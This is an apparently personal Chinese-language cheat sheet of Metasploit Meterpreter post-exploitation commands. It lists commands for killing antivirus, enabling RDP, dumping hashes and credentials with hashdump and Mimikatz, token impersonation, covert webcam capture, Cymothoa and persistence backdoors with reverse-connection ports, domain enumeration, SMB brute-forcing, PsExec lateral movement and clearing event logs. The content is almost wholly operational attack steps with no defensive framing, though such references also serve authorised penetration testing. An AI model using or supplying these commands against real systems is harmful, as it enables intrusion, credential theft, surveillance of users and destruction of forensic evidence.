程序遷移:
ps 擷取程序
getpid shell的程序号
migrate 遷移
run post/windows/manage/migrate 自動遷移
shell之後:
sysinfo 擷取系統資訊
run post/windows/gather/checkvm 檢視目标是否允許在虛拟機
idletime 最近運作的時間
route 檢視目錄完整網絡
getuid 目前使用者名
run post/windows/manage/killav 關閉防毒軟體
run post/windows/manage/enable_rdp 開啟3389
run post/windows/manage/autoroute 目标子網情況
background 隐藏背景
route add 添加路由
route print檢視
run post/windows/gather/enum_logged_on_users 列舉目前有多少使用者登入過目标主機
run post/windows/gather/enum_applocations 列舉安裝在目标主機上
run post/windows/gather/credentials/windows_autologin 抓取自動登入的使用者名密碼
load espia screengrad 抓取此時螢幕截圖
webcam_list 有無攝像頭
webcam_snap 拍照
webcam_stream 開啟直播模式
shell 進入目标shell
檔案系統指令:
pwd或getwd 目标主機目前處于哪個目錄
getlwd 自己處于哪個目錄
search -f *.txt -d c:\ 搜尋c盤下所有txt檔案
download c:\test.txt /root 下載下傳到本機
upload /root/text.txt c: 上傳
權限提升:
whoami/groups 檢視目前權限
getuid 檢視目前權限
getsystem 嘗試提權
systeminfo 檢視更新檔
使用wmic 列出安裝的更新檔
令牌竊取:
use incognito
list_token -u 列出token
impersonate_token +上述列出的有效令牌 假冒令牌攻擊(需要兩個\\)
成功後運作shell
Hash攻擊:
1.使用hashdump 抓取密碼
非SYSTEM運作時會失敗
run windows/gather/smart_hashdump 導出域所有使用者(windows7.開啟UAC會導緻失敗)
2.Quarks PwDump
3.windows credentials Editor(WCE)
上傳wce到目标。找到檔案 wce -w
4.Mimikatz(管理者)
load Mimikatz 加載
msv 抓取Hash
kerberos 抓取系統票據
wdigest 擷取系統賬戶資訊
mimikatz_command -f samdump::hashed 抓取hash
mimikatz_command -f handle::list 檢視程序
mimikatz_command -f service::list windows 服務
mimikatz_command -f crypto::listProviders 檢視系統證書
支援PowerShell調用(Invoke-Mimikatz)
後門:
1.Cymothoa:
cymothoa -p 982 -s 1 -y 4444 選擇PID為982的程序為宿主程序,使用第一類Shellcode,指定反彈端口4444
nc -nvv 目标主機 4444 使用nc進行連接配接
2.Persistence:
run persistence -A -S -U -i 60 -p 4321 -r 目标主機
A :自動啟動payload程式
S :系統啟動時自動加載
U :使用者登入時自動啟動
X :開機時自動加載
i :回連的時間間隔
P :監聽反向連接配接端口号
r :目标主機
Web 後門:
msf中使用generate生成
内網滲透:
資訊收集:
net user /domain : 檢視域使用者
net view /domain : 檢視有幾個域
net view /domain :xxx 檢視域内主機
net group /domain : 檢視域裡面的組
net group "domain computers" /domain 檢視域内所有的主機名
net group "domain admins " /domain 檢視域管理者
net group "domain controllers" /domain 檢視域控制器
net group "enterprise admins" /domain 檢視企業管理器
nettime /domain 檢視時間伺服器
PowerShell 尋找域管線上服務
擷取域管理權
登入域控制:使用msf中的PsExec 反彈Meterpreter
SMB爆破内網:
先添加路由
然後使用smb_login 或psexec_scanner
route add
creds
清理日志:
删除所有使用者
clearev 删除日志
安安靜靜變優秀。 --胖丫